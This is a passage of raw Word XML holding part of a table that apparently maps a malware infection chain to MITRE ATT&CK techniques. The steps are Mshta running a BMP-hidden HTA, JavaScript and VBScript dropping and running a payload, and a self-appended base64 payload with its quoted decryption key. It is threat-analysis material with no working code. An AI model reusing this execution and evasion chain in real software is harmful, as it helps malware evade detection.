            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7556BDA7" w14:textId="25796180" w:rsidR="00522B73" w:rsidRDefault="00522B73" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BB6B172" w14:textId="19B3BAAF" w:rsidR="00522B73" w:rsidRPr="00A9033C" w:rsidRDefault="00522B73" w:rsidP="00616B39">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148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AC22CF8" w14:textId="11056D27" w:rsidR="00522B73" w:rsidRPr="00D07C95" w:rsidRDefault="00522B73" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00522B73">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1218.005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00522B73">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">System Binary Proxy Execution: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00522B73">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1643F5AC" w14:textId="6450B353" w:rsidR="00522B73" w:rsidRDefault="00522B73" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48347737" w14:textId="77777777" w:rsidR="00522B73" w:rsidRPr="00ED5880" w:rsidRDefault="00522B73" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FCE4782" w14:textId="18392BC4" w:rsidR="00522B73" w:rsidRDefault="00522B73" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="479A077D" w14:textId="0084E027" w:rsidR="00522B73" w:rsidRPr="00ED5880" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE/IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B1E2843" w14:textId="6A6A157D" w:rsidR="00522B73" w:rsidRDefault="00522B73" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="000324F6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A9033C">
              <w:t xml:space="preserve">call </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A9033C">
              <w:t>Mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A9033C">
              <w:t xml:space="preserve"> to execute the bmp file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D07C95" w:rsidRPr="00ED5880" w14:paraId="6E2F7411" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1671AE1F" w14:textId="72922249" w:rsidR="00D07C95" w:rsidRDefault="00522B73" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2231994E" w14:textId="38C3B567" w:rsidR="00D07C95" w:rsidRPr="00ED5880" w:rsidRDefault="00D07C95" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63D30818" w14:textId="2D7C779F" w:rsidR="00D07C95" w:rsidRPr="00ED5880" w:rsidRDefault="00D07C95" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D07C95">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.007</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D07C95">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31EA7ADA" w14:textId="5A1DFB56" w:rsidR="00D07C95" w:rsidRDefault="00522B73" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B77D9E3" w14:textId="77777777" w:rsidR="00D07C95" w:rsidRPr="00ED5880" w:rsidRDefault="00D07C95" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FEE8108" w14:textId="396F0CCD" w:rsidR="00D07C95" w:rsidRPr="00D07C95" w:rsidRDefault="00D07C95" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD8BFC9" w14:textId="673570C5" w:rsidR="00D07C95" w:rsidRPr="00ED5880" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55425E7B" w14:textId="048B8835" w:rsidR="00D07C95" w:rsidRDefault="00D07C95" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00CF11A7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r>
              <w:t>The BMP file after decompression contains a HTA file which executes Java Script to drop a payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4CEE" w:rsidRPr="00ED5880" w14:paraId="0801FD71" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B0E871B" w14:textId="429631B3" w:rsidR="002C4CEE" w:rsidRDefault="00B54722" w:rsidP="002C4CEE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6761D572" w14:textId="1AC86E1C" w:rsidR="002C4CEE" w:rsidRPr="00ED5880" w:rsidRDefault="002C4CEE" w:rsidP="002C4CEE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F4670EC" w14:textId="6FB8ECDF" w:rsidR="002C4CEE" w:rsidRPr="00ED5880" w:rsidRDefault="002C4CEE" w:rsidP="002C4CEE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C4CEE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D07C95">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Scripting Interpreter: </w:t>
            </w:r>
            <w:r w:rsidRPr="002C4CEE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C66E6E6" w14:textId="4A333C33" w:rsidR="002C4CEE" w:rsidRDefault="002C4CEE" w:rsidP="002C4CEE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52B4E53D" w14:textId="77777777" w:rsidR="002C4CEE" w:rsidRPr="00ED5880" w:rsidRDefault="002C4CEE" w:rsidP="002C4CEE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00CB2D48" w14:textId="488E0DD7" w:rsidR="002C4CEE" w:rsidRPr="00ED5880" w:rsidRDefault="002C4CEE" w:rsidP="002C4CEE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D94C7A6" w14:textId="49AECB27" w:rsidR="002C4CEE" w:rsidRPr="00ED5880" w:rsidRDefault="003519AF" w:rsidP="002C4CEE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FBBF064" w14:textId="0EB136B6" w:rsidR="002C4CEE" w:rsidRDefault="002C4CEE" w:rsidP="002C4CEE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00CF11A7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidRPr="002C4CEE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">At the end it calls </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002C4CEE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Wscript.Run</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002C4CEE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> to execute the dropped payload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008035DA" w:rsidRPr="00ED5880" w14:paraId="0EBE85FD" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16426A49" w14:textId="14F009B4" w:rsidR="008035DA" w:rsidRDefault="00B54722" w:rsidP="008035DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF42433" w14:textId="42C9A69C" w:rsidR="008035DA" w:rsidRPr="00ED5880" w:rsidRDefault="008035DA" w:rsidP="008035DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidR="00930491">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r w:rsidR="005D751B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="005D751B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D1D7C6A" w14:textId="44BB5B15" w:rsidR="008035DA" w:rsidRPr="00ED5880" w:rsidRDefault="008035DA" w:rsidP="008035DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1140 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3AB7B7" w14:textId="2080F209" w:rsidR="008035DA" w:rsidRDefault="00B54722" w:rsidP="008035DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AA6ACB7" w14:textId="77777777" w:rsidR="008035DA" w:rsidRPr="00ED5880" w:rsidRDefault="008035DA" w:rsidP="008035DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="773CBC06" w14:textId="7DCA067F" w:rsidR="008035DA" w:rsidRPr="00ED5880" w:rsidRDefault="008035DA" w:rsidP="008035DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70062052" w14:textId="731299E8" w:rsidR="008035DA" w:rsidRPr="00ED5880" w:rsidRDefault="003519AF" w:rsidP="008035DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3612EA97" w14:textId="61DB934A" w:rsidR="008035DA" w:rsidRDefault="008035DA" w:rsidP="008035DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00CF11A7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AppStore.exe loads a base64 encrypted payload that has been added to the end of itself. Before the payload there is a string which is the decryption key (by7mJSoKVDaWg*</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ub</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B54722" w:rsidRPr="00B54722" w14:paraId="26F13C36" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="492BF90E" w14:textId="79969853" w:rsidR="00B54722" w:rsidRPr="00B54722" w:rsidRDefault="00B54722" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36FE6AB3" w14:textId="7EC72CEA" w:rsidR="00B54722" w:rsidRPr="00B54722" w:rsidRDefault="00B54722" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">TA0011 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59501BFC" w14:textId="184C2033" w:rsidR="00B54722" w:rsidRPr="00B54722" w:rsidRDefault="00B54722" w:rsidP="00B54722">
            <w:pPr>
